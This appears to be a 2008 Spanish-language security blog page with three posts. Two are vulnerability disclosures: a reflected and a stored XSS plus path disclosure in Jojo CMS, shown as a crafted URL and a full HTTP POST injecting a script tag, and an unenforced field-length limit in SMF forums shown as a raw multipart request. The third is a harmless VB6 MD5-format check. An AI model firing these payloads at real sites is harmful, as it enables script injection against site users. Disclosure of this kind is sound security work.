Jojo cms XSS & FPD

|
No Comments »

Posted in Vulnerabilidades on November 12th, 2008 by >> s E t H <<

Nombre: Jojo cms
Web: http://www.jojocms.org/
Version: 1.0 rc1
Reporte: http://bugs.jojocms.org/details/task134
Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00
Parcheado: no
Tipo de vulnerabilidad: XSS y FPD

Cross site scripting (non-persistent) and Full path disclosure:
http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E

Cross site scripting (persistent)

HTTP HEADERS (I injected in ‘name’ variable):

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417
Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.12259305
62.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=1192482
74.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website
=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+
%3E%3E

RESULT:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script>
</a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>
Cross site scripting (persistent):
http://demo.jojocms.org/blog/1/welcome-to-jojocms/

sorry, my english is not good Sad

Tuve que poner saltos de linea de mas porque no pude poner bien unos textarea, supongo que se entiende igual.

Tags: , , , |

IsMd5() - VB6

|
No Comments »

Posted in Criptografia, Visual Basic 6 on November 10th, 2008 by >> s E t H <<

Hice esta funcion para comprobar si la cadena ingresada es un hash MD5. Para eso hay que tener en cuenta estas caracteristicas:

  • Tiene que tener 32 bytes de longitud
  • Tiene que tener solamente caracteres hexadecimales (0-9, A-F)

Public Function IsMd5(Entrada As String) As Boolean
If Len(Entrada) <> 32 Then
IsMd5 = False
Exit Function
End If

Dim i As Byte
For i = 1 To 32
If IsNumeric(”&H” & Mid(Entrada, i, 1)) = False Then
IsMd5 = False
Exit Function
End If
Next i

IsMd5 = True
End Function

Tags: |

Mini bug en smf :P

|
No Comments »

Posted in Vulnerabilidades on November 5th, 2008 by >> s E t H <<

En Simple Machines Forum se puede poner un texto debajo de la imagen personal. Resulta “lo maximo que se puede poner son 50 caracteres”:

<td><input name="personalText" size="50" maxlength="50" value="jelou guorld" type="text"></td>

El problema es que en el php no se comprueba que el usuario no halla puesto un texto mas largo. Por ejemplo, tenemos esto:

foro.elhacker.net/profile2.htmlPOST /profile2.html HTTP/1.1
Host: foro.elhacker.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: foro.elhacker.net/profiles/s_e_t_h-u252901.html;sa,forumProfile
Cookie: WTF?!=
Content-Type: multipart/form-data; boundary=—————————29617909925023
Content-Length: 2300
—————————–29617909925023
Content-Disposition: form-data; name=”cat”

blank.gif
—————————–29617909925023
Content-Disposition: form-data; name=”avatar_choice”

external
—————————–29617909925023
Content-Disposition: form-data; name=”userpicpersonal”

http://www.jluis37.com/2005mar/carretera2.jpg
—————————–29617909925023
Content-Disposition: form-data; name=”personalText”

Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos… Como ven, esto es mas largo de lo permitido
—————————–29617909925023
Content-Disposition: form-data; name=”bday3″

0000
—————————–29617909925023
Content-Disposition: form-data; name=”bday1″

00
—————————–29617909925023
Content-Disposition: form-data; name=”bday2″

00
—————————–29617909925023
Content-Disposition: form-data; name=”location”

—————————–29617909925023
Content-Disposition: form-data; name=”gender”

0
—————————–29617909925023
Content-Disposition: form-data; name=”ICQ”

—————————–29617909925023
Content-Disposition: form-data; name=”AIM”

—————————–29617909925023
Content-Disposition: form-data; name=”MSN”

—————————–29617909925023
Content-Disposition: form-data; name=”YIM”

—————————–29617909925023
Content-Disposition: form-data; name=”signature”

[url=http://seth.inkt.fdchost.com/]¡ENTRA EN MI BLOG O TE JUANKEO![/url]

[img]http://i260.photobucket.com/albums/ii32/calumrulez/vb.png[/img]
—————————–29617909925023
Content-Disposition: form-data; name=”websiteTitle”

MI BLOG!

ETC…

Como ven, se pudo modificar sin problemas. El mismo error existe al crear un nuevo tema, en el largo del titulo. No funcionó al editar el titulo de un tema creado anteriormente ni al modificar la firma del usuario.

El alcance de este bug es deformar el foro XD

Click en la imagen para agrandar

Tags: |

« Older Entries